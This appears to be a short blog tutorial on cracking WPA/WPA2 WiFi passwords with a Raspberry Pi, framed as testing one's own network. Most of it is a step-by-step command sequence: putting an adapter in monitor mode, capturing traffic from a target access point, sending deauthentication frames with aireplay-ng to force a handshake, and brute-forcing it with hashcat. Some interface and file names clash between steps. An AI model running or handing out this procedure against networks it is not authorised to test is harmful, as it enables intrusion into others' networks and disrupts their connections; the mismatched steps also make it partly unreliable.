How to Hack WiFi Networks Using Raspberry Pi

WiFi technology is used almost in every home and business. This is understandable, given how convenient internet connectivity becomes with WiFi. This convenience comes with a price, and that price is privacy. Since WiFi is wireless this means anyone within range of the router can eavesdrop on your connection and gain access to your network.

In this article, I want to teach you how to test your own network to see how easy it is to gain access to it.

In order to be able to perform this task, we need some SW and HW tools.

Raspberry Pi 3/4 running Raspberry OS

WiFi adaptor with monitor mode capabilities

Caputring a WPA/WPA2 Handshake

The handshake is a process in which the device and the router exchange keys that are used to encrypt the data and secure the connection.

We will make use of a penetration testing tool call Aircarck-ng.

Install Aircarck-ng on your Pi

sudo apt-get update
sudo apt-get upgrade
sudo apt-get install aircrack-ng

Discover network interface on your system

sudo airmon-ng

A list of the Wireless interfaces will show up

PHY     Interface       Driver          Chipset

phy0    wlan0           brcmfmac        Broadcom 43430
phy1    wlan1           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n

In this example, we can see two wireless interfaces. wlan0 using Chipset by Broadcom and wlan1 using a chipset by Qualcomm.

We will use wlan1, since it has monitor mode capabilities.

To start monitor mode on wlan1 run the following command:

sudo airmon-ng start wlan1

A virtual network device will be created, you can see the active interfaces with the following command

sudo iwconfig

now we can monitor the surrounding for WiFi networks with the following command:

sudo airodump-ng wlan1mon --write SSID.txt

Select a network you wish to capture packets from. take the bssid and channel from the SSID.txt file.

sudo airodump-ng wlan0mon --output-format pcap --bssid F0:9F:C0:AA:6C:B8 -c 6 --write test01

Now we will capture the WPA2-PSK Handshake by sending a re-authentication request.

On a separate terminal run the command to send 5 re-authentication requests

sudo aireplay-ng -0 5 -a F0:9F:C0:AA:6C:B8 wlan1mon

now you can stop the capturing and the re-authentication requests

check if the handshake was captured

sudo aircrack-ng test01.cap

Now that you have the .cap file. you need to copy it to a machine that is capable of running hashcat to start cracking it.


We will use Hashcat to crack the password. Hashcat is an open source software used for password recovery.

To install Hashcat on windows, download the binaries from Hashcat website.

To install Hashcat on Linux run the following command

sudo apt-get install hashcat

or download the binaries


To start the password recover run:

hashcat.exe -m 22000 -a 3 capture.hccapx ?d?d?d?d?d?d?d?d

Leave a Comment